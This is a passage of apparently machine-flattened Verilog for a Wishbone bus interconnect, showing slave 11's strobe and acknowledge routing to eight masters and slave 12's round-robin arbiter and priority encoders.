    always @ (  ( ( ( s11_pri_sel == 2'd0 ) ) ? ( s11_arb_state ) : ( ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( s11_msel_arb0_state ) : ( ( ( ( s11_msel_pri_sel == 2'd1 ) ) ? ( s11_msel_sel1 ) : ( s11_msel_sel2 ) ) ) ) ) ) or  ( ( ( m0_slv_sel == 4'd11 ) ) ? ( m0_stb_i ) : ( 1'b0 ) ) or  ( ( ( m1_slv_sel == 4'd11 ) ) ? ( m1_stb_i ) : ( 1'b0 ) ) or  ( ( ( m2_slv_sel == 4'd11 ) ) ? ( m2_stb_i ) : ( 1'b0 ) ) or  ( ( ( m3_slv_sel == 4'd11 ) ) ? ( m3_stb_i ) : ( 1'b0 ) ) or  ( ( ( m4_slv_sel == 4'd11 ) ) ? ( m4_stb_i ) : ( 1'b0 ) ) or  ( ( ( m5_slv_sel == 4'd11 ) ) ? ( m5_stb_i ) : ( 1'b0 ) ) or  ( ( ( m6_slv_sel == 4'd11 ) ) ? ( m6_stb_i ) : ( 1'b0 ) ) or  ( ( ( m7_slv_sel == 4'd11 ) ) ? ( m7_stb_i ) : ( 1'b0 ) ))
    begin
        case ( ( ( ( s11_pri_sel == 2'd0 ) ) ? ( s11_arb_state ) : ( ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( s11_msel_arb0_state ) : ( ( ( ( s11_msel_pri_sel == 2'd1 ) ) ? ( s11_msel_sel1 ) : ( s11_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s11_wb_stb_o = ( ( ( m0_slv_sel == 4'd11 ) ) ? ( m0_stb_i ) : ( 1'b0 ) );
        end
        3'd1:
        begin
            s11_wb_stb_o = ( ( ( m1_slv_sel == 4'd11 ) ) ? ( m1_stb_i ) : ( 1'b0 ) );
        end
        3'd2:
        begin
            s11_wb_stb_o = ( ( ( m2_slv_sel == 4'd11 ) ) ? ( m2_stb_i ) : ( 1'b0 ) );
        end
        3'd3:
        begin
            s11_wb_stb_o = ( ( ( m3_slv_sel == 4'd11 ) ) ? ( m3_stb_i ) : ( 1'b0 ) );
        end
        3'd4:
        begin
            s11_wb_stb_o = ( ( ( m4_slv_sel == 4'd11 ) ) ? ( m4_stb_i ) : ( 1'b0 ) );
        end
        3'd5:
        begin
            s11_wb_stb_o = ( ( ( m5_slv_sel == 4'd11 ) ) ? ( m5_stb_i ) : ( 1'b0 ) );
        end
        3'd6:
        begin
            s11_wb_stb_o = ( ( ( m6_slv_sel == 4'd11 ) ) ? ( m6_stb_i ) : ( 1'b0 ) );
        end
        3'd7:
        begin
            s11_wb_stb_o = ( ( ( m7_slv_sel == 4'd11 ) ) ? ( m7_stb_i ) : ( 1'b0 ) );
        end
        endcase
    end
    assign s11_m0_ack_o = ( ( ( ( ( s11_pri_sel == 2'd0 ) ) ? ( s11_arb_state ) : ( ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( s11_msel_arb0_state ) : ( ( ( ( s11_msel_pri_sel == 2'd1 ) ) ? ( s11_msel_sel1 ) : ( s11_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & s11_ack_i );
    assign s11_m1_ack_o = ( ( ( ( ( s11_pri_sel == 2'd0 ) ) ? ( s11_arb_state ) : ( ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( s11_msel_arb0_state ) : ( ( ( ( s11_msel_pri_sel == 2'd1 ) ) ? ( s11_msel_sel1 ) : ( s11_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & s11_ack_i );
    assign s11_m2_ack_o = ( ( ( ( ( s11_pri_sel == 2'd0 ) ) ? ( s11_arb_state ) : ( ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( s11_msel_arb0_state ) : ( ( ( ( s11_msel_pri_sel == 2'd1 ) ) ? ( s11_msel_sel1 ) : ( s11_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & s11_ack_i );
    assign s11_m3_ack_o = ( ( ( ( ( s11_pri_sel == 2'd0 ) ) ? ( s11_arb_state ) : ( ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( s11_msel_arb0_state ) : ( ( ( ( s11_msel_pri_sel == 2'd1 ) ) ? ( s11_msel_sel1 ) : ( s11_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & s11_ack_i );
    assign s11_m4_ack_o = ( ( ( ( ( s11_pri_sel == 2'd0 ) ) ? ( s11_arb_state ) : ( ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( s11_msel_arb0_state ) : ( ( ( ( s11_msel_pri_sel == 2'd1 ) ) ? ( s11_msel_sel1 ) : ( s11_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & s11_ack_i );
    assign s11_m5_ack_o = ( ( ( ( ( s11_pri_sel == 2'd0 ) ) ? ( s11_arb_state ) : ( ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( s11_msel_arb0_state ) : ( ( ( ( s11_msel_pri_sel == 2'd1 ) ) ? ( s11_msel_sel1 ) : ( s11_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & s11_ack_i );
    assign s11_m6_ack_o = ( ( ( ( ( s11_pri_sel == 2'd0 ) ) ? ( s11_arb_state ) : ( ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( s11_msel_arb0_state ) : ( ( ( ( s11_msel_pri_sel == 2'd1 ) ) ? ( s11_msel_sel1 ) : ( s11_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & s11_ack_i );
    assign s11_m7_ack_o = ( ( ( ( ( s11_pri_sel == 2'd0 ) ) ? ( s11_arb_state ) : ( ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( s11_msel_arb0_state ) : ( ( ( ( s11_msel_pri_sel == 2'd1 ) ) ? ( s11_msel_sel1 ) : ( s11_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & s11_ack_i );
    assign s11_m0_err_o = ( ( ( ( ( s11_pri_sel == 2'd0 ) ) ? ( s11_arb_state ) : ( ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( s11_msel_arb0_state ) : ( ( ( ( s11_msel_pri_sel == 2'd1 ) ) ? ( s11_msel_sel1 ) : ( s11_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & s11_err_i );
    assign s11_m1_err_o = ( ( ( ( ( s11_pri_sel == 2'd0 ) ) ? ( s11_arb_state ) : ( ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( s11_msel_arb0_state ) : ( ( ( ( s11_msel_pri_sel == 2'd1 ) ) ? ( s11_msel_sel1 ) : ( s11_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & s11_err_i );
    assign s11_m2_err_o = ( ( ( ( ( s11_pri_sel == 2'd0 ) ) ? ( s11_arb_state ) : ( ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( s11_msel_arb0_state ) : ( ( ( ( s11_msel_pri_sel == 2'd1 ) ) ? ( s11_msel_sel1 ) : ( s11_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & s11_err_i );
    assign s11_m3_err_o = ( ( ( ( ( s11_pri_sel == 2'd0 ) ) ? ( s11_arb_state ) : ( ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( s11_msel_arb0_state ) : ( ( ( ( s11_msel_pri_sel == 2'd1 ) ) ? ( s11_msel_sel1 ) : ( s11_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & s11_err_i );
    assign s11_m4_err_o = ( ( ( ( ( s11_pri_sel == 2'd0 ) ) ? ( s11_arb_state ) : ( ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( s11_msel_arb0_state ) : ( ( ( ( s11_msel_pri_sel == 2'd1 ) ) ? ( s11_msel_sel1 ) : ( s11_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & s11_err_i );
    assign s11_m5_err_o = ( ( ( ( ( s11_pri_sel == 2'd0 ) ) ? ( s11_arb_state ) : ( ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( s11_msel_arb0_state ) : ( ( ( ( s11_msel_pri_sel == 2'd1 ) ) ? ( s11_msel_sel1 ) : ( s11_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & s11_err_i );
    assign s11_m6_err_o = ( ( ( ( ( s11_pri_sel == 2'd0 ) ) ? ( s11_arb_state ) : ( ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( s11_msel_arb0_state ) : ( ( ( ( s11_msel_pri_sel == 2'd1 ) ) ? ( s11_msel_sel1 ) : ( s11_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & s11_err_i );
    assign s11_m7_err_o = ( ( ( ( ( s11_pri_sel == 2'd0 ) ) ? ( s11_arb_state ) : ( ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( s11_msel_arb0_state ) : ( ( ( ( s11_msel_pri_sel == 2'd1 ) ) ? ( s11_msel_sel1 ) : ( s11_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & s11_err_i );
    assign s11_m0_rty_o = ( ( ( ( ( s11_pri_sel == 2'd0 ) ) ? ( s11_arb_state ) : ( ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( s11_msel_arb0_state ) : ( ( ( ( s11_msel_pri_sel == 2'd1 ) ) ? ( s11_msel_sel1 ) : ( s11_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & s11_rty_i );
    assign s11_m1_rty_o = ( ( ( ( ( s11_pri_sel == 2'd0 ) ) ? ( s11_arb_state ) : ( ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( s11_msel_arb0_state ) : ( ( ( ( s11_msel_pri_sel == 2'd1 ) ) ? ( s11_msel_sel1 ) : ( s11_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & s11_rty_i );
    assign s11_m2_rty_o = ( ( ( ( ( s11_pri_sel == 2'd0 ) ) ? ( s11_arb_state ) : ( ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( s11_msel_arb0_state ) : ( ( ( ( s11_msel_pri_sel == 2'd1 ) ) ? ( s11_msel_sel1 ) : ( s11_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & s11_rty_i );
    assign s11_m3_rty_o = ( ( ( ( ( s11_pri_sel == 2'd0 ) ) ? ( s11_arb_state ) : ( ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( s11_msel_arb0_state ) : ( ( ( ( s11_msel_pri_sel == 2'd1 ) ) ? ( s11_msel_sel1 ) : ( s11_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & s11_rty_i );
    assign s11_m4_rty_o = ( ( ( ( ( s11_pri_sel == 2'd0 ) ) ? ( s11_arb_state ) : ( ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( s11_msel_arb0_state ) : ( ( ( ( s11_msel_pri_sel == 2'd1 ) ) ? ( s11_msel_sel1 ) : ( s11_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & s11_rty_i );
    assign s11_m5_rty_o = ( ( ( ( ( s11_pri_sel == 2'd0 ) ) ? ( s11_arb_state ) : ( ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( s11_msel_arb0_state ) : ( ( ( ( s11_msel_pri_sel == 2'd1 ) ) ? ( s11_msel_sel1 ) : ( s11_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & s11_rty_i );
    assign s11_m6_rty_o = ( ( ( ( ( s11_pri_sel == 2'd0 ) ) ? ( s11_arb_state ) : ( ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( s11_msel_arb0_state ) : ( ( ( ( s11_msel_pri_sel == 2'd1 ) ) ? ( s11_msel_sel1 ) : ( s11_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & s11_rty_i );
    assign s11_m7_rty_o = ( ( ( ( ( s11_pri_sel == 2'd0 ) ) ? ( s11_arb_state ) : ( ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( s11_msel_arb0_state ) : ( ( ( ( s11_msel_pri_sel == 2'd1 ) ) ? ( s11_msel_sel1 ) : ( s11_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & s11_rty_i );
    assign s12_wb_data_i = s12_data_i;
    assign s12_data_o = s12_wb_data_o;
    assign s12_addr_o = s12_wb_addr_o;
    assign s12_sel_o = s12_wb_sel_o;
    assign s12_we_o = s12_wb_we_o;
    assign s12_cyc_o = s12_wb_cyc_o;
    assign s12_stb_o = s12_wb_stb_o;
    assign s12_wb_ack_i = s12_ack_i;
    assign s12_wb_err_i = s12_err_i;
    assign s12_wb_rty_i = s12_rty_i;
    always @ (  posedge clk_i)
    begin
        s12_next <=  ~( s12_wb_cyc_o);
    end
    assign s12_arb_req = { m7_s12_cyc_o, m6_s12_cyc_o, m5_s12_cyc_o, m4_s12_cyc_o, m3_s12_cyc_o, m2_s12_cyc_o, m1_s12_cyc_o, m0_s12_cyc_o };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s12_arb_state <= s12_arb_grant0;
        end
        else
        begin 
            s12_arb_state <= s12_arb_next_state;
        end
    end
    always @ (  s12_arb_state or  { m7_s12_cyc_o, m6_s12_cyc_o, m5_s12_cyc_o, m4_s12_cyc_o, m3_s12_cyc_o, m2_s12_cyc_o, m1_s12_cyc_o, m0_s12_cyc_o } or  1'b0)
    begin
        s12_arb_next_state = s12_arb_state;
        case ( s12_arb_state ) 
        s12_arb_grant0:
        begin
            if (  !( s12_arb_req[0]) | 1'b0 ) 
            begin
                if ( s12_arb_req[1] ) 
                begin
                    s12_arb_next_state = s12_arb_grant1;
                end
                else
                begin 
                    if ( s12_arb_req[2] ) 
                    begin
                        s12_arb_next_state = s12_arb_grant2;
                    end
                    else
                    begin 
                        if ( s12_arb_req[3] ) 
                        begin
                            s12_arb_next_state = s12_arb_grant3;
                        end
                        else
                        begin 
                            if ( s12_arb_req[4] ) 
                            begin
                                s12_arb_next_state = s12_arb_grant4;
                            end
                            else
                            begin 
                                if ( s12_arb_req[5] ) 
                                begin
                                    s12_arb_next_state = s12_arb_grant5;
                                end
                                else
                                begin 
                                    if ( s12_arb_req[6] ) 
                                    begin
                                        s12_arb_next_state = s12_arb_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s12_arb_req[7] ) 
                                        begin
                                            s12_arb_next_state = s12_arb_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s12_arb_grant1:
        begin
            if (  !( s12_arb_req[1]) | 1'b0 ) 
            begin
                if ( s12_arb_req[2] ) 
                begin
                    s12_arb_next_state = s12_arb_grant2;
                end
                else
                begin 
                    if ( s12_arb_req[3] ) 
                    begin
                        s12_arb_next_state = s12_arb_grant3;
                    end
                    else
                    begin 
                        if ( s12_arb_req[4] ) 
                        begin
                            s12_arb_next_state = s12_arb_grant4;
                        end
                        else
                        begin 
                            if ( s12_arb_req[5] ) 
                            begin
                                s12_arb_next_state = s12_arb_grant5;
                            end
                            else
                            begin 
                                if ( s12_arb_req[6] ) 
                                begin
                                    s12_arb_next_state = s12_arb_grant6;
                                end
                                else
                                begin 
                                    if ( s12_arb_req[7] ) 
                                    begin
                                        s12_arb_next_state = s12_arb_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s12_arb_req[0] ) 
                                        begin
                                            s12_arb_next_state = s12_arb_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s12_arb_grant2:
        begin
            if (  !( s12_arb_req[2]) | 1'b0 ) 
            begin
                if ( s12_arb_req[3] ) 
                begin
                    s12_arb_next_state = s12_arb_grant3;
                end
                else
                begin 
                    if ( s12_arb_req[4] ) 
                    begin
                        s12_arb_next_state = s12_arb_grant4;
                    end
                    else
                    begin 
                        if ( s12_arb_req[5] ) 
                        begin
                            s12_arb_next_state = s12_arb_grant5;
                        end
                        else
                        begin 
                            if ( s12_arb_req[6] ) 
                            begin
                                s12_arb_next_state = s12_arb_grant6;
                            end
                            else
                            begin 
                                if ( s12_arb_req[7] ) 
                                begin
                                    s12_arb_next_state = s12_arb_grant7;
                                end
                                else
                                begin 
                                    if ( s12_arb_req[0] ) 
                                    begin
                                        s12_arb_next_state = s12_arb_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s12_arb_req[1] ) 
                                        begin
                                            s12_arb_next_state = s12_arb_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s12_arb_grant3:
        begin
            if (  !( s12_arb_req[3]) | 1'b0 ) 
            begin
                if ( s12_arb_req[4] ) 
                begin
                    s12_arb_next_state = s12_arb_grant4;
                end
                else
                begin 
                    if ( s12_arb_req[5] ) 
                    begin
                        s12_arb_next_state = s12_arb_grant5;
                    end
                    else
                    begin 
                        if ( s12_arb_req[6] ) 
                        begin
                            s12_arb_next_state = s12_arb_grant6;
                        end
                        else
                        begin 
                            if ( s12_arb_req[7] ) 
                            begin
                                s12_arb_next_state = s12_arb_grant7;
                            end
                            else
                            begin 
                                if ( s12_arb_req[0] ) 
                                begin
                                    s12_arb_next_state = s12_arb_grant0;
                                end
                                else
                                begin 
                                    if ( s12_arb_req[1] ) 
                                    begin
                                        s12_arb_next_state = s12_arb_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s12_arb_req[2] ) 
                                        begin
                                            s12_arb_next_state = s12_arb_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s12_arb_grant4:
        begin
            if (  !( s12_arb_req[4]) | 1'b0 ) 
            begin
                if ( s12_arb_req[5] ) 
                begin
                    s12_arb_next_state = s12_arb_grant5;
                end
                else
                begin 
                    if ( s12_arb_req[6] ) 
                    begin
                        s12_arb_next_state = s12_arb_grant6;
                    end
                    else
                    begin 
                        if ( s12_arb_req[7] ) 
                        begin
                            s12_arb_next_state = s12_arb_grant7;
                        end
                        else
                        begin 
                            if ( s12_arb_req[0] ) 
                            begin
                                s12_arb_next_state = s12_arb_grant0;
                            end
                            else
                            begin 
                                if ( s12_arb_req[1] ) 
                                begin
                                    s12_arb_next_state = s12_arb_grant1;
                                end
                                else
                                begin 
                                    if ( s12_arb_req[2] ) 
                                    begin
                                        s12_arb_next_state = s12_arb_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s12_arb_req[3] ) 
                                        begin
                                            s12_arb_next_state = s12_arb_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s12_arb_grant5:
        begin
            if (  !( s12_arb_req[5]) | 1'b0 ) 
            begin
                if ( s12_arb_req[6] ) 
                begin
                    s12_arb_next_state = s12_arb_grant6;
                end
                else
                begin 
                    if ( s12_arb_req[7] ) 
                    begin
                        s12_arb_next_state = s12_arb_grant7;
                    end
                    else
                    begin 
                        if ( s12_arb_req[0] ) 
                        begin
                            s12_arb_next_state = s12_arb_grant0;
                        end
                        else
                        begin 
                            if ( s12_arb_req[1] ) 
                            begin
                                s12_arb_next_state = s12_arb_grant1;
                            end
                            else
                            begin 
                                if ( s12_arb_req[2] ) 
                                begin
                                    s12_arb_next_state = s12_arb_grant2;
                                end
                                else
                                begin 
                                    if ( s12_arb_req[3] ) 
                                    begin
                                        s12_arb_next_state = s12_arb_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s12_arb_req[4] ) 
                                        begin
                                            s12_arb_next_state = s12_arb_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s12_arb_grant6:
        begin
            if (  !( s12_arb_req[6]) | 1'b0 ) 
            begin
                if ( s12_arb_req[7] ) 
                begin
                    s12_arb_next_state = s12_arb_grant7;
                end
                else
                begin 
                    if ( s12_arb_req[0] ) 
                    begin
                        s12_arb_next_state = s12_arb_grant0;
                    end
                    else
                    begin 
                        if ( s12_arb_req[1] ) 
                        begin
                            s12_arb_next_state = s12_arb_grant1;
                        end
                        else
                        begin 
                            if ( s12_arb_req[2] ) 
                            begin
                                s12_arb_next_state = s12_arb_grant2;
                            end
                            else
                            begin 
                                if ( s12_arb_req[3] ) 
                                begin
                                    s12_arb_next_state = s12_arb_grant3;
                                end
                                else
                                begin 
                                    if ( s12_arb_req[4] ) 
                                    begin
                                        s12_arb_next_state = s12_arb_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s12_arb_req[5] ) 
                                        begin
                                            s12_arb_next_state = s12_arb_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s12_arb_grant7:
        begin
            if (  !( s12_arb_req[7]) | 1'b0 ) 
            begin
                if ( s12_arb_req[0] ) 
                begin
                    s12_arb_next_state = s12_arb_grant0;
                end
                else
                begin 
                    if ( s12_arb_req[1] ) 
                    begin
                        s12_arb_next_state = s12_arb_grant1;
                    end
                    else
                    begin 
                        if ( s12_arb_req[2] ) 
                        begin
                            s12_arb_next_state = s12_arb_grant2;
                        end
                        else
                        begin 
                            if ( s12_arb_req[3] ) 
                            begin
                                s12_arb_next_state = s12_arb_grant3;
                            end
                            else
                            begin 
                                if ( s12_arb_req[4] ) 
                                begin
                                    s12_arb_next_state = s12_arb_grant4;
                                end
                                else
                                begin 
                                    if ( s12_arb_req[5] ) 
                                    begin
                                        s12_arb_next_state = s12_arb_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s12_arb_req[6] ) 
                                        begin
                                            s12_arb_next_state = s12_arb_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s12_msel_req = { m7_s12_cyc_o, m6_s12_cyc_o, m5_s12_cyc_o, m4_s12_cyc_o, m3_s12_cyc_o, m2_s12_cyc_o, m1_s12_cyc_o, m0_s12_cyc_o };
    assign s12_msel_pri_enc_valid = { m7_s12_cyc_o, m6_s12_cyc_o, m5_s12_cyc_o, m4_s12_cyc_o, m3_s12_cyc_o, m2_s12_cyc_o, m1_s12_cyc_o, m0_s12_cyc_o };
    always @ (  s12_msel_pri_enc_valid[0] or  { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[1] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[0] ) ) })
    begin
        if (  !( s12_msel_pri_enc_valid[0]) ) 
        begin
            s12_msel_pri_enc_pd0_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[1] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[0] ) ) } == 2'h0 ) 
            begin
                s12_msel_pri_enc_pd0_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[1] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[0] ) ) } == 2'h1 ) 
                begin
                    s12_msel_pri_enc_pd0_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[1] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[0] ) ) } == 2'h2 ) 
                    begin
                        s12_msel_pri_enc_pd0_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s12_msel_pri_enc_pd0_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s12_msel_pri_enc_valid[0] or  { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[1] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[0] ) ) })
    begin
        if (  !( s12_msel_pri_enc_valid[0]) ) 
        begin
            s12_msel_pri_enc_pd0_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[1] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[0] ) ) } == 2'h0 ) 
            begin
                s12_msel_pri_enc_pd0_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s12_msel_pri_enc_pd0_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s12_msel_pri_enc_valid[1] or  { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[3] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[2] ) ) })
    begin
        if (  !( s12_msel_pri_enc_valid[1]) ) 
        begin
            s12_msel_pri_enc_pd1_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[3] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[2] ) ) } == 2'h0 ) 
            begin
                s12_msel_pri_enc_pd1_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[3] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[2] ) ) } == 2'h1 ) 
                begin
                    s12_msel_pri_enc_pd1_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[3] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[2] ) ) } == 2'h2 ) 
                    begin
                        s12_msel_pri_enc_pd1_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s12_msel_pri_enc_pd1_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s12_msel_pri_enc_valid[1] or  { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[3] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[2] ) ) })
    begin
        if (  !( s12_msel_pri_enc_valid[1]) ) 
        begin
            s12_msel_pri_enc_pd1_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[3] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[2] ) ) } == 2'h0 ) 
            begin
                s12_msel_pri_enc_pd1_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s12_msel_pri_enc_pd1_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s12_msel_pri_enc_valid[2] or  { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[5] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[4] ) ) })
    begin
        if (  !( s12_msel_pri_enc_valid[2]) ) 
        begin
            s12_msel_pri_enc_pd2_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[5] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[4] ) ) } == 2'h0 ) 
            begin
                s12_msel_pri_enc_pd2_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[5] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[4] ) ) } == 2'h1 ) 
                begin
                    s12_msel_pri_enc_pd2_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[5] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[4] ) ) } == 2'h2 ) 
                    begin
                        s12_msel_pri_enc_pd2_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s12_msel_pri_enc_pd2_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s12_msel_pri_enc_valid[2] or  { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[5] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[4] ) ) })
    begin
        if (  !( s12_msel_pri_enc_valid[2]) ) 
        begin
            s12_msel_pri_enc_pd2_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[5] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[4] ) ) } == 2'h0 ) 
            begin
                s12_msel_pri_enc_pd2_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s12_msel_pri_enc_pd2_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s12_msel_pri_enc_valid[3] or  { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[7] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[6] ) ) })
    begin
        if (  !( s12_msel_pri_enc_valid[3]) ) 
        begin
            s12_msel_pri_enc_pd3_pri_out_d1 = 4'b0001;
        end
        else
        begin 
